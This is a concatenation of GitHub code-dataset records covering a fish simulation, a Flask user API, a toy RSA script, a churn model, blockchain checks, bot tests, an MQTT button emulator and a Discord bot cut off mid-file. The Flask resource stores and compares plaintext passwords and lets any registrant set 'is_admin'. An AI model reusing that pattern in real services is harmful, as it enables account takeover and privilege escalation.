self.update_ellipses.emit(self.behavior_robot, self.allfish)\n\n self.parameter_ui.zor_spinbox.setValue(self.zor)\n self.parameter_ui.zoo_spinbox.setValue(self.zoo)\n self.parameter_ui.zoa_spinbox.setValue(self.zoa)\n\n def set_zone_preset(self, size):\n \"\"\"\n Change zone radii for all agents to preset\n \"\"\"\n if size == 0:\n self.zor = self.config[\"ZONE_MODES\"][\"SMALL\"][\"zor\"]\n self.zoo = self.config[\"ZONE_MODES\"][\"SMALL\"][\"zoo\"]\n self.zoa = self.config[\"ZONE_MODES\"][\"SMALL\"][\"zoa\"]\n\n if size == 1:\n self.zor = self.config[\"ZONE_MODES\"][\"LARGE\"][\"zor\"]\n self.zoo = self.config[\"ZONE_MODES\"][\"LARGE\"][\"zoo\"]\n self.zoa = self.config[\"ZONE_MODES\"][\"LARGE\"][\"zoa\"]\n\n if size == 2:\n self.zor = self.config[\"ZONE_MODES\"][\"CHALL\"][\"zor\"]\n self.zoo = self.config[\"ZONE_MODES\"][\"CHALL\"][\"zoo\"]\n self.zoa = self.config[\"ZONE_MODES\"][\"CHALL\"][\"zoa\"]\n\n for f in self.allfish:\n f.change_zones(self.zor, self.zoo, self.zoa)\n\n if self.debug_vis:\n self.update_ellipses.emit(self.behavior_robot, self.allfish)\n\n self.parameter_ui.zor_spinbox.setValue(self.zor)\n self.parameter_ui.zoo_spinbox.setValue(self.zoo)\n self.parameter_ui.zoa_spinbox.setValue(self.zoa)\n\n def set_speed(self, speed):\n \"\"\"\n Set speed of all fish\n \"\"\"\n for f in self.allfish:\n if f.id != 0:\n f.max_speed = speed\n\n def challenge_status(self, toggle):\n \"\"\"\n Receive challenge status update\n \"\"\"\n status = \"started!\" if toggle == 1 else \"stopped!\"\n logging.info(f\"Challenge {status}\")\n\n # endregion\n","repo_name":"jotpio/behavior_HF","sub_path":"src/challenge_simulation.py","file_name":"challenge_simulation.py","file_ext":"py","file_size_in_byte":17272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16368815613","text":"from flask_restful import Resource, reqparse\nfrom flask_jwt import jwt_required\nfrom models.user import UserModel\n\n\nclass User(Resource):\n parse = reqparse.RequestParser()\n parse.add_argument(\n \"unique_name\",\n type=str,\n required=True,\n help=\"This field cannot be empty!\",\n )\n parse.add_argument(\n \"first_name\",\n type=str,\n required=True,\n help=\"This field cannot be empty\",\n )\n parse.add_argument(\n \"last_name\",\n type=str,\n required=True,\n help=\"This field cannot be empty\",\n )\n parse.add_argument(\n \"is_admin\",\n type=bool,\n required=True,\n help=\"This field cannot be empty\",\n )\n parse.add_argument(\n \"password\",\n type=str,\n required=True,\n help=\"This field cannot be empty\",\n )\n\n @jwt_required()\n def get(self, unique_name):\n user = UserModel.find_by_unique_name(unique_name)\n if user:\n return user.json()\n return {\"message\": \"User not found.\"}\n\n @jwt_required()\n def delete(self, unique_name):\n user = UserModel.find_by_unique_name(unique_name)\n if user:\n user.delete_from_db()\n return {\"message\": \"User deleted.\"}, 200\n\n @jwt_required()\n def put(self, unique_name):\n data = User.parse.parse_args()\n user = UserModel.find_by_unique_name(unique_name)\n if user:\n if user.password != data[\"password\"]:\n return {\"message\": \"Password does not match\"}\n\n user.unique_name = data[\"unique_name\"]\n user.first_name = data[\"first_name\"]\n user.last_name = data[\"last_name\"]\n user.is_admin = data[\"is_admin\"]\n user.save_to_db()\n else:\n return {\"message\": \"Please register first\"}\n return user.json(), 202\n\n\nclass UserRegister(Resource):\n \"\"\"\n Handle registration of new users\n \"\"\"\n\n parse = 
reqparse.RequestParser()\n parse.add_argument(\n \"unique_name\",\n type=str,\n required=True,\n help=\"This field cannot be empty!\",\n )\n parse.add_argument(\n \"first_name\",\n type=str,\n required=True,\n help=\"This field cannot be empty\",\n )\n parse.add_argument(\n \"last_name\",\n type=str,\n required=True,\n help=\"This field cannot be empty\",\n )\n parse.add_argument(\n \"is_admin\",\n type=bool,\n required=True,\n help=\"This field cannot be empty\",\n )\n parse.add_argument(\n \"password\",\n type=str,\n required=True,\n help=\"This field cannot be empty\",\n )\n\n def post(self):\n data = UserRegister.parse.parse_args()\n if UserModel.find_by_unique_name(data[\"unique_name\"]):\n return {\"message\": \"User already exists\"}\n\n # user = UserModel(\n # data[\"unique_name\"],\n # data[\"name\"],\n # data[\"first_name\"],\n # data[\"is_admin\"],\n # data[\"password\"],\n # )\n user = UserModel(**data)\n user.save_to_db()\n\n return {\"message\": \"User created successfully\"}, 202\n","repo_name":"iteemhe/office-hours-queue","sub_path":"api/resources/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":3164,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"6568266115","text":"__author__ = 'Rakatak'\n# given values\n\ndef egcd(a, b):\n x,y, u,v = 0,1, 1,0\n while a != 0:\n q, r = b//a, b%a\n m, n = x-u*q, y-v*q\n b,a, x,y, u,v = a,r, u,v, m,n\n gcd = b\n return gcd, x, y\n\ndef modinv(a, m):\n gcd, x, y = egcd(a, m)\n if gcd != 1:\n return None # modular inverse does not exist\n else:\n return x % m\n\np = 41\nq = 17\ne = 39\nm = 9\n\nn = p * q\nprint(\"n = \" + str(n))\nphiN = (p - 1) * (q - 1)\nprint(\"phiN = \" + str(phiN))\nd = modinv(e, phiN)\nprint(\"Inverse to phiN and e is \" + str(d))\nprint(\"d = \" + str(d))\nvalueOne = (d*e) % phiN\nprint(\"valueOne = \" + str(valueOne))\nprint(\"Public key is (e, n) => (\" + str(e) + \", \" + str(n) + \")\")\nprint(\"Private key is (d, n) => (\" + str(d) + \", \" + str(n) + \")\")\nc = m**e % n\nprint(\"Encrypted Message of 9 is \" + str(c))\ndM = c**d % n\nprint(\"Decrypted Message of \" + str(c) + \" is \" + str(dM))\n","repo_name":"Rakatak/SichereVerteilteSysteme","sub_path":"A3/RSAExp.py","file_name":"RSAExp.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"894084895","text":"# library doc string\n\n\n# import libraries\nimport shap\nimport joblib\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns; sns.set()\n\nfrom sklearn.preprocessing import normalize\nfrom sklearn.model_selection import train_test_split\n\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import GridSearchCV\n\nfrom sklearn.metrics import plot_roc_curve, classification_report\n\n\ndef import_data(pth):\n '''\n returns dataframe for the csv found at pth\n\n input:\n pth: a path to the csv\n output:\n df: pandas dataframe\n '''\n df = pd.read_csv(pth)\n df['Churn'] = df['Attrition_Flag'].apply(lambda val: 0 if val == \"Existing Customer\" else 1)\n return df\n\n\ndef perform_eda(df):\n '''\n perform eda on df and save figures to images folder\n input:\n df: pandas dataframe\n\n output:\n None\n '''\n df['Churn'] = df['Attrition_Flag'].apply(lambda val: 0 if val == \"Existing Customer\" else 1)\n plt.figure(figsize=(20,10)) \n df['Churn'].hist();\n 
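# perform_eda writes each figure to the images folder instead of displaying it\n 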
plt.savefig('./images/churn.png')\n\n plt.figure(figsize=(20,10))\n df['Customer_Age'].hist();\n plt.savefig('./images/test.png')\n \n\n\ndef encoder_helper(df, category_lst, response='Churn'):\n '''\n helper function to turn each categorical column into a new column with\n proportion of churn for each category - associated with cell 15 from the notebook\n\n input:\n df: pandas dataframe\n category_lst: list of columns that contain categorical features\n response: string of response name [optional argument that could be used for naming variables or index y column]\n\n output:\n df: pandas dataframe with new columns for\n '''\n for category in category_lst:\n category_list=[]\n category_groups = df.groupby(category).mean()['Churn']\n\n for val in df[category]:\n category_list.append(category_groups.loc[val])\n \n df[category+'_'+response] = category_list\n return df\n\n\ndef perform_feature_engineering(df, response=['Customer_Age', 'Dependent_count', 'Months_on_book',\n 'Total_Relationship_Count', 'Months_Inactive_12_mon',\n 'Contacts_Count_12_mon', 'Credit_Limit', 'Total_Revolving_Bal',\n 'Avg_Open_To_Buy', 'Total_Amt_Chng_Q4_Q1', 'Total_Trans_Amt',\n 'Total_Trans_Ct', 'Total_Ct_Chng_Q4_Q1', 'Avg_Utilization_Ratio',\n 'Gender_Churn', 'Education_Level_Churn', 'Marital_Status_Churn', \n 'Income_Category_Churn', 'Card_Category_Churn']):\n '''\n input:\n df: pandas dataframe\n response: string of response name [optional argument that could be used for naming variables or index y column]\n\n output:\n X_train: X training data\n X_test: X testing data\n y_train: y training data\n y_test: y testing data\n '''\n y = df['Churn']\n X_data = pd.DataFrame()\n X_data[response] = df[response]\n model_dict = dict()\n X_data_2 = X_data\n X_train, X_test, y_train, y_test = train_test_split(X_data, y, test_size= 0.3, random_state=42)\n \n model_dict['X_train']=X_train\n model_dict['X_test']=X_test\n model_dict['y_train']=y_train\n model_dict['y_test']=y_test\n \n return (model_dict, X_data_2)\n\ndef classification_report_image(y_train,\n y_test,\n y_train_preds_lr,\n y_train_preds_rf,\n y_test_preds_lr,\n y_test_preds_rf,\n output_pth):\n '''\n produces classification report for training and testing results and stores report as image\n in images folder\n input:\n y_train: training response values\n y_test: test response values\n y_train_preds_lr: training predictions from logistic regression\n y_train_preds_rf: training predictions from random forest\n y_test_preds_lr: test predictions from logistic regression\n y_test_preds_rf: test predictions from random forest\n\n output:\n None\n '''\n\n plt.clf()\n plt.rc('figure', figsize=(5, 5))\n plt.text(0.01, 1, str('Random Forest Train Results'), {\n 'fontsize': 10}, fontproperties='monospace')\n \n plt.text(0.01, 0.7, str(classification_report(y_train, y_train_preds_rf)), {\n 'fontsize': 10}, fontproperties='monospace') # approach improved by OP -> monospace!\n \n plt.text(0.01, 0.6, str('Random Forest Test Results'), {\n 'fontsize': 10}, fontproperties='monospace')\n \n plt.text(0.01, 0.3, str(classification_report(y_test, y_test_preds_rf)), {\n 'fontsize': 10}, fontproperties='monospace') # approach improved by OP -> monospace!\n \n plt.text(0.6, 1, str('Logistic Regression Train Results'), {\n 'fontsize': 10}, fontproperties='monospace')\n \n plt.text(0.6, 0.7, str(classification_report(y_train, y_train_preds_lr)), {\n 'fontsize': 10}, fontproperties='monospace') # approach improved by OP -> monospace!\n \n plt.text(0.6, 0.6, str('Logistic Regression Test 
Results'), {\n 'fontsize': 10}, fontproperties='monospace')\n \n plt.text(0.6, 0.3, str(classification_report(y_test, y_test_preds_lr)), {\n 'fontsize': 10}, fontproperties='monospace') # approach improved by OP -> monospace!\n\n plt.savefig(output_pth + 'model_results.png')\n \ndef feature_importance_plot(cv_rfc, X_data, output_pth):\n '''\n creates and stores the feature importances in pth\n input:\n model: model object containing feature_importances_\n X_data: pandas dataframe of X values\n output_pth: path to store the figure\n\n output:\n None\n '''\n \n # Calculate feature importances\n importances = cv_rfc.best_estimator_.feature_importances_\n # importances = model.feature_importances_\n # Sort feature importances in descending order\n indices = np.argsort(importances)[::-1]\n\n # Rearrange feature names so they match the sorted feature importances\n names = [X_data.columns[i] for i in indices]\n\n # Create plot\n plt.figure(figsize=(20,5))\n\n # Create plot title\n plt.title(\"Feature Importance\")\n plt.ylabel('Importance')\n\n # Add bars\n plt.bar(range(X_data.shape[1]), importances[indices])\n\n # Add feature names as x-axis labels\n plt.xticks(range(X_data.shape[1]), names, rotation=90)\n # plt.subplots_adjust(bottom=.15)\n # Save Plot\n plt.savefig(output_pth + 'features.png')\n\ndef train_models(feature_engineering_dict):\n '''\n train, store model results: images + scores, and store models\n input:\n X_train: X training data\n X_test: X testing data\n y_train: y training data\n y_test: y testing data\n output:\n None\n '''\n X_train = feature_engineering_dict['X_train']\n X_test = feature_engineering_dict['X_test']\n y_train = feature_engineering_dict['y_train']\n y_test = feature_engineering_dict['y_test']\n\n # grid search\n rfc = RandomForestClassifier(random_state=42)\n lrc = LogisticRegression(solver='lbfgs', max_iter=3000)\n\n param_grid = { \n 'n_estimators': [200, 500],\n 'max_features': ['auto', 'sqrt'],\n 'max_depth' : [4,5,100],\n 'criterion' :['gini', 'entropy']\n }\n\n cv_rfc = GridSearchCV(estimator=rfc, param_grid=param_grid, cv=5)\n cv_rfc.fit(X_train, y_train)\n\n lrc.fit(X_train, y_train)\n\n y_train_preds_rf = cv_rfc.best_estimator_.predict(X_train)\n y_test_preds_rf = cv_rfc.best_estimator_.predict(X_test)\n\n y_train_preds_lr = lrc.predict(X_train)\n y_test_preds_lr = lrc.predict(X_test)\n\n lrc_plot = plot_roc_curve(lrc, X_test, y_test)\n plt.savefig('./images/model_1.png')\n # plots\n plt.figure(figsize=(15, 8))\n ax = plt.gca()\n rfc_disp = plot_roc_curve(cv_rfc.best_estimator_, X_test, y_test, ax=ax, alpha=0.8)\n lrc_plot.plot(ax=ax, alpha=0.8)\n plt.savefig('./images/model_2.png')\n\n \n # save best model\n joblib.dump(cv_rfc.best_estimator_, './models/rfc_model.pkl')\n joblib.dump(lrc, './models/logistic_model.pkl')\n \n rfc_model = joblib.load('./models/rfc_model.pkl')\n lr_model = joblib.load('./models/logistic_model.pkl')\n\n lrc_plot = plot_roc_curve(lr_model, X_test, y_test)\n plt.savefig('./images/model_3.png')\n\n plt.figure(figsize=(15, 8))\n ax = plt.gca()\n rfc_disp = plot_roc_curve(rfc_model, X_test, y_test, ax=ax, alpha=0.8)\n lrc_plot.plot(ax=ax, alpha=0.8)\n plt.savefig('./images/model_4.png')\n \n \n return y_train, y_test, y_train_preds_lr, y_train_preds_rf, y_test_preds_lr, y_test_preds_rf, rfc_model, lr_model, cv_rfc\nif __name__ == \"__main__\":\n df = import_data('./data/bank_data.csv')\n perform_eda(import_data('./data/bank_data.csv'))\n 
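# encoder_helper adds a '<column>_Churn' companion for each column below, holding the mean churn of the row's category value\n 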
category_list=['Gender','Education_Level','Marital_Status','Income_Category','Card_Category']\n df = (encoder_helper(df,category_list))\n model_dict, X_data = perform_feature_engineering(df)\n a,b,c,d,e,f,rfc_model, lr_model, cv_rfc = train_models(model_dict)\n # classification_report_image(a,b,c,d,e,f,'./images/')\n feature_importance_plot(cv_rfc, X_data, './')\n","repo_name":"gonzalezpear/churn_udacity_project","sub_path":"churn_library.py","file_name":"churn_library.py","file_ext":"py","file_size_in_byte":10158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35621576079","text":"\"\"\"Provides verification helper methods\"\"\"\n\nfrom utility.hash_util import hash_block, hash_string_256\nfrom wallet import Wallet\n\n\nclass VerficationHelper:\n \n @staticmethod\n def valid_proof(transactions, last_hash, proof):\n guess = (str([tx.to_ordered_dict() for tx in transactions]) + str(last_hash) + str(proof)).encode() \n guess_hash = hash_string_256(guess)\n # print(guess_hash)\n return guess_hash[0:4] == '0000'\n\n @classmethod\n def verify_chain(cls, blockchain):\n for (index, block) in enumerate(blockchain):\n if index == 0:\n continue\n if block.previous_hash != hash_block(blockchain[index-1]):\n return False\n\n if not cls.valid_proof(block.trax[:-1], block.previous_hash, block.proof):\n print('Proof of work is invalid')\n return False\n return True\n\n @staticmethod\n def verify_trax(transaction, get_balance, check_funds=True):\n if check_funds == True:\n sender_balance = get_balance(transaction.tx_sender)\n return sender_balance >= transaction.tx_amount and Wallet.verify_traxSign(transaction)\n else:\n return Wallet.verify_traxSign(transaction)\n\n @classmethod\n def verify_allTrax(cls, open_trax, get_balance):\n return all([cls.verify_trax(el,get_balance, False) for el in open_trax])","repo_name":"MWaris97/Projects","sub_path":"FYP/source/TessChain/utility/verificationHelper.py","file_name":"verificationHelper.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"43348856698","text":"import json\nfrom pathlib import Path\nfrom unittest.mock import Mock\n\nimport pytest\nimport textwrap\nimport responses as rsps\nimport click\nfrom ruamel.yaml import YAML\n\nfrom archery.bot import (\n CommentBot, CommandError, CrossbowCommentFormatter, group\n)\n\n\n@pytest.fixture\ndef responses():\n with rsps.RequestsMock() as mock:\n yield mock\n\n\ndef load_fixture(name):\n path = Path(__file__).parent / 'fixtures' / name\n with path.open('r') as fp:\n if name.endswith('.json'):\n return json.load(fp)\n elif name.endswith('.yaml'):\n yaml = YAML()\n return yaml.load(fp)\n else:\n return fp.read()\n\n\ndef github_url(path):\n return 'https://api.github.com:443/{}'.format(path.strip('/'))\n\n\n@group()\ndef custom_handler():\n pass\n\n\n@custom_handler.command()\n@click.pass_obj\ndef extra(obj):\n return obj\n\n\n@custom_handler.command()\n@click.option('--force', '-f', is_flag=True)\ndef build(force):\n return force\n\n\n@custom_handler.command()\n@click.option('--name', required=True)\ndef benchmark(name):\n return name\n\n\ndef test_click_based_commands():\n assert custom_handler('build') is False\n assert custom_handler('build -f') is True\n\n assert custom_handler('benchmark --name strings') == 'strings'\n with pytest.raises(CommandError):\n assert custom_handler('benchmark')\n\n assert custom_handler('extra', extra='data') == 
{'extra': 'data'}\n\n\ndef test_crossbow_comment_formatter():\n job = load_fixture('crossbow-job.yaml')\n msg = load_fixture('crossbow-success-message.md')\n\n formatter = CrossbowCommentFormatter(crossbow_repo='ursa-labs/crossbow')\n response = formatter.render(job)\n expected = msg.format(\n repo='ursa-labs/crossbow',\n branch='ursabot-1',\n revision='f766a1d615dd1b7ee706d05102e579195951a61c',\n status='has been succeeded.'\n )\n assert response == textwrap.dedent(expected).strip()\n\n\n@pytest.mark.parametrize('fixture_name', [\n # the bot is not mentioned, nothing to do\n 'event-issue-comment-not-mentioning-ursabot.json',\n # don't respond to itself, it prevents recursive comment storms!\n 'event-issue-comment-by-ursabot.json',\n # non-authorized user sent the comment, do not respond\n 'event-issue-comment-by-non-authorized-user.json',\n])\ndef test_noop_events(fixture_name):\n payload = load_fixture(fixture_name)\n\n handler = Mock()\n bot = CommentBot(name='ursabot', token='', handler=handler)\n bot.handle('issue_comment', payload)\n\n handler.assert_not_called()\n\n\ndef test_issue_comment_without_pull_request(responses):\n responses.add(\n responses.GET,\n github_url('/repositories/169101701/issues/19'),\n json=load_fixture('issue-19.json'),\n status=200\n )\n responses.add(\n responses.GET,\n github_url('repos/ursa-labs/ursabot/pulls/19'),\n json={},\n status=404\n )\n responses.add(\n responses.POST,\n github_url('/repos/ursa-labs/ursabot/issues/19/comments'),\n json={}\n )\n\n def handler(command, **kwargs):\n pass\n\n payload = load_fixture('event-issue-comment-without-pull-request.json')\n bot = CommentBot(name='ursabot', token='', handler=handler)\n bot.handle('issue_comment', payload)\n\n post = responses.calls[2]\n assert json.loads(post.request.body) == {\n 'body': \"The comment bot only listens to pull request comments!\"\n }\n\n\ndef test_respond_with_usage(responses):\n responses.add(\n responses.GET,\n github_url('/repositories/169101701/issues/26'),\n json=load_fixture('issue-26.json'),\n status=200\n )\n responses.add(\n responses.GET,\n github_url('/repos/ursa-labs/ursabot/pulls/26'),\n json=load_fixture('pull-request-26.json'),\n status=200\n )\n responses.add(\n responses.GET,\n github_url('/repos/ursa-labs/ursabot/issues/comments/480243811'),\n json=load_fixture('issue-comment-480243811.json')\n )\n responses.add(\n responses.POST,\n github_url('/repos/ursa-labs/ursabot/issues/26/comments'),\n json={}\n )\n\n def handler(command, **kwargs):\n raise CommandError('test-usage')\n\n payload = load_fixture('event-issue-comment-with-empty-command.json')\n bot = CommentBot(name='ursabot', token='', handler=handler)\n bot.handle('issue_comment', payload)\n\n post = responses.calls[3]\n assert json.loads(post.request.body) == {'body': '```\\ntest-usage\\n```'}\n\n\n@pytest.mark.parametrize(('command', 'reaction'), [\n ('@ursabot build', '+1'),\n ('@ursabot listen', '-1'),\n])\ndef test_issue_comment_with_commands(responses, command, reaction):\n responses.add(\n responses.GET,\n github_url('/repositories/169101701/issues/26'),\n json=load_fixture('issue-26.json'),\n status=200\n )\n responses.add(\n responses.GET,\n github_url('/repos/ursa-labs/ursabot/pulls/26'),\n json=load_fixture('pull-request-26.json'),\n status=200\n )\n responses.add(\n responses.GET,\n github_url('/repos/ursa-labs/ursabot/issues/comments/480248726'),\n json=load_fixture('issue-comment-480248726.json')\n )\n responses.add(\n responses.POST,\n github_url(\n 
'/repos/ursa-labs/ursabot/issues/comments/480248726/reactions'\n ),\n json={}\n )\n\n def handler(command, **kwargs):\n if command == 'build':\n return True\n else:\n raise ValueError('Only `build` command is supported.')\n\n payload = load_fixture('event-issue-comment-build-command.json')\n payload[\"comment\"][\"body\"] = command\n\n bot = CommentBot(name='ursabot', token='', handler=handler)\n bot.handle('issue_comment', payload)\n\n post = responses.calls[3]\n assert json.loads(post.request.body) == {'content': reaction}\n\n\n# TODO(kszucs): properly mock it\n# def test_crossbow_submit():\n# from click.testing import CliRunner\n# runner = CliRunner()\n# result = runner.invoke(\n# bot, ['crossbow', 'submit', '-g', 'wheel', '--dry-run']\n# )\n# assert result.exit_code == 0\n","repo_name":"snowflakedb/libsnowflakeclient","sub_path":"deps/arrow-0.17.1/dev/archery/archery/tests/test_bot.py","file_name":"test_bot.py","file_ext":"py","file_size_in_byte":6137,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"61"} +{"seq_id":"30909564890","text":"from pynput import keyboard\n\nfrom mqtt.mqtt_client import MQTTClient\nfrom virtual_devices.button_v import ButtonV, ButtonState\n\nclient1 = MQTTClient(\"fogdevices.agh.edu.pl\")\nbutton_1 = ButtonV(2, 3, client1)\nbutton_2 = ButtonV(2, 4, client1)\nbutton_3 = ButtonV(2, 5, client1)\n\nbuttons = [button_1, button_2, button_3]\n\n\"\"\"\nExample shows a simple simulation of button pressing/releasing in reaction to keyboard presses. Pressing the 0, 1, 2 keys\ntriggers events for the corresponding buttons. When a button state changes, an MQTT message is generated. Scenario decorators are\nnot used in this example.\n\"\"\"\n\n\ndef on_press(key):\n if hasattr(key, 'char') and key.char in ['0', '1', '2']:\n print('alphanumeric key {0} pressed'.format(key.char))\n buttons[int(key.char)].set_state_v(ButtonState.ON)\n elif key == keyboard.Key.esc:\n return False\n else:\n print('special key {0} pressed'.format(key))\n\n\ndef on_release(key):\n print('{0} released'.format(key))\n if hasattr(key, 'char') and key.char in ['0', '1', '2']:\n print('alphanumeric key {0} released'.format(key.char))\n buttons[int(key.char)].set_state_v(ButtonState.OFF)\n\n elif key == keyboard.Key.esc:\n return False\n\n\n# Collect events until released\nwith keyboard.Listener(\n on_press=on_press,\n on_release=on_release) as listener:\n listener.join()\n","repo_name":"tszydlo/emulator","sub_path":"examples/use_cases/use_case_3.py","file_name":"use_case_3.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"14602822548","text":"from time import time\n\nimport cv2\n\n\nclass RealtimeCapture:\n def __init__(self, params):\n self.capture = cv2.VideoCapture(params)\n self.video_frame_time = 0\n self.start_time = None\n\n def get_time(self):\n return self.video_frame_time\n\n def read(self):\n if self.start_time is None:\n self.start_time = time()\n\n process_time = time() - self.start_time\n\n ret, frame = self.capture.read()\n while self.video_frame_time + process_time > self.capture.get(cv2.CAP_PROP_POS_MSEC) / 1000:\n ret, frame = self.capture.read()\n\n self.start_time = time()\n self.video_frame_time = self.capture.get(cv2.CAP_PROP_POS_MSEC) / 1000\n\n return ret, frame\n\n\nif __name__ == \"__main__\":\n rc = RealtimeCapture(0)\n\n start_time = time()\n while True:\n r, frame = rc.read()\n current_time = time()\n frame_time = 
rc.get_time()\n\n if r:\n cv2.putText(frame, \"Video Time: \" + str(frame_time), (30, 30), cv2.FONT_HERSHEY_COMPLEX, 0.5, (255, 255, 0))\n cv2.putText(frame, \"Wall Time: \" + str(current_time - start_time), (30, 55), cv2.FONT_HERSHEY_COMPLEX, 0.5,\n (255, 255, 0))\n cv2.imshow(\"Preview\", frame)\n\n k = cv2.waitKey(1)\n if k == ord(\"q\"):\n break\n","repo_name":"eduze/PersonDetectors","sub_path":"RealtimeCapture.py","file_name":"RealtimeCapture.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"4325914395","text":"#\n# persist_counters App\n\nimport appdaemon.plugins.hass.hassapi as hass\nimport os\nimport datetime\nimport pickle\nimport sqlite3\nfrom contextlib import closing\n\n_counter_filename_ = '/home/homeassistant/.homeassistant/apps/counters.pkl'\n_db_filename_ = '/home/homeassistant/.homeassistant/apps/autolight.db'\n\nclass AutoLight_Global(hass.Hass):\n\tcounter_dict = {}\n\tdecision_log = []\n\tautolight_bd = None\n\n\tdef initialize(self):\n\t\tself.log(\"Hello from AutoLight_Global\")\n\n\t\t# Register hourly callback to save everything\n\t\tself.daily_handle = self.run_hourly(self.hourly_save, start=datetime.time(0, 0, 0))\n\n\t\t# Register callback to save counters on hass stop\n\t\thandle = self.listen_event(self.hass_stopped, event='plugin_stopped')\n\n\t\t# Register callback to load counters on hass start\n\t\t# handle = self.listen_event(self.hass_started, event='plugin_started')\n\n\t\t# Register callback on app terminate\n\t\thandle = self.listen_event(self.hourly_save, event='terminate')\n\n\t\t# Restore counters\n\t\tself.load_counters()\n\n\t\t# Check if DB exists\n\t\tif not os.path.isfile(_db_filename_):\n\t\t\tself.log(\"AutoLight_Global creating new DB\")\n\t\t\ttmpconn = sqlite3.connect(_db_filename_)\n\t\t\twith closing(tmpconn.cursor()) as c:\n\t\t\t\t# ['fake', 4, 10, 'off,off,on,off,off,off,off,on,off,off,off,off,+25.5,33.0', 15, 0]\n\t\t\t\tc.execute('''CREATE TABLE decisions(\n\t\t\t\t\t\t\tentity text,\n\t\t\t\t\t\t\tweekday integer,\n\t\t\t\t\t\t\thour integer,\n\t\t\t\t\t\t\tcontext text,\n\t\t\t\t\t\t\tturned_on_interval integer,\n\t\t\t\t\t\t\tresult integer)''')\n\n\t\t# Test\n\t\t# self.log(\"***Saving test fake data\")\n\t\t# self.book_decision_data('fake1')\n\t\t# self.book_decision_result(15, 0)\n\t\t# self.save_decision_data()\n\n\tdef hourly_save(self, event_name, data, kwargs):\n\t\tself.log(\"****saving\")\n\t\tself.save_counters('dummy arg')\n\t\tself.save_decision_data()\n\n\tdef hass_stopped(self, event_name, data, kwargs):\n\t\tself.save_counters('dummy arg')\n\n\t# def hass_started(self, event_name, data, kwargs):\n\t# \tself.load_counters()\n\n\tdef load_counters(self):\n\t\tself.log(\"Loading persistent counters\")\n\t\tif os.path.isfile(_counter_filename_):\n\t\t\tself.counter_dict = pickle.load(open(_counter_filename_, 'rb'))\n\t\t\t# Set data\n\t\t\tfor counter_name in self.counter_dict.keys():\n\t\t\t\tself.log(\"Restoring counter: %s: %s\" % (counter_name, self.counter_dict[counter_name]))\n\t\t\t\tself.set_state(counter_name, state=str(self.counter_dict[counter_name]))\n\t\t\t\tself.log(\"done\")\n\n\tdef save_counters(self, kwargs):\n\t\tself.log(\"Saving persistent counters\")\n\t\t# Save data\n\t\tpickle.dump(self.counter_dict, open(_counter_filename_, 'wb'))\n\n\tdef increment_counter(self, counter_name):\n\t\tself.log(\"AutoLight_Global incrementing counter %s\" % counter_name)\n\t\t# Increment counter from current 
state\n\t\tself.call_service(\"counter/increment\", entity_id=counter_name)\n\t\t# Save in counter_dict\n\t\tself.counter_dict[counter_name] = self.get_state(counter_name)\n\n\n\tdef book_decision_result(self, variables_data, turned_on_interval, result):\n\t\tself.log(\"book_decision_result: %s / %d / %d\" % (variables_data, turned_on_interval, result))\n\t\tvariables_data.append(turned_on_interval)\n\t\tvariables_data.append(result)\n\t\tself.decision_log.append(variables_data.copy())\n\n\t\tself.log(\"book_decision_result done 1: %s\" % self.decision_log)\n\t\t# Clear variables_data\n\t\tdel variables_data[:]\n\t\tself.log(\"book_decision_result done 2: %s\" % self.decision_log)\n\n\tdef save_decision_data(self):\n\t\tif len(self.decision_log) > 0:\n\t\t\tself.log(\"Saving decision data: %s\" % self.decision_log)\n\t\t\tself.log(\"DB: %s\" % _db_filename_)\n\t\t\tcon = sqlite3.connect(_db_filename_)\n\t\t\t# Save data\n\t\t\twith con:\n\t\t\t\tcur = con.cursor()\n\t\t\t\tcur.executemany(\"\"\"INSERT INTO decisions VALUES(?,?,?,?,?,?)\"\"\", self.decision_log)\n\t\t\t\t# for d in self.decision_log:\n\t\t\t\t\t# self.log(\"Saving data: %s\" % d)\n\t\t\t\t\t# ['fake', 4, 10, 'off,off,on,off,off,off,off,on,off,off,off,off,+25.5,33.0', 15, 0]\n\t\t\t\t# cur.execute(\"INSERT INTO decisions VALUES(?,?,?,?,?,?)\" % (d[0],d[1],d[2],d[3],d[4],d[5]))\n\t\t\t# pickle.dump(self.decision_log, open(filename, 'wb'))\n\t\t\tprint(\"%s\" % self.decision_log)\n\t\t\t# Clear data\n\t\t\tself.decision_log = []\n\t\telse:\n\t\t\tself.log(\"No decision data to save\")\n","repo_name":"randomstash/hassconfig","sub_path":"apps/autolight_global.py","file_name":"autolight_global.py","file_ext":"py","file_size_in_byte":4102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18568789076","text":"import discord\nfrom discord.ext import commands\nimport random\n\nclass Fun(commands.Cog):\n\n def __init__(self,client):\n self.client = client\n \n # Events\n @commands.Cog.listener()\n async def on_ready(self):\n print('Fun Bot is online.')\n\n @commands.command(help=\"gives a nice compliment!\")\n async def compliment(self, ctx):\n compliments = [ \"You look great today!\" ,\n \"You have really really nice programming skills.\" ,\n \"You make an excellent human.\",\n \"You’re a true gift to the people in your life.\",\n \"You’re amazing!\",\n \"You have a remarkable sense of humor.\",\n \"You are one of a kind.\",\n \"You inspire me to be a better Bot.\",\n \"Simply knowing you has made me a better Bot.\",\n \"All my Bot friends think you're really cool!\"]\n await ctx.send(random.choice(compliments))\n \n @commands.command(aliases=['8ball'], 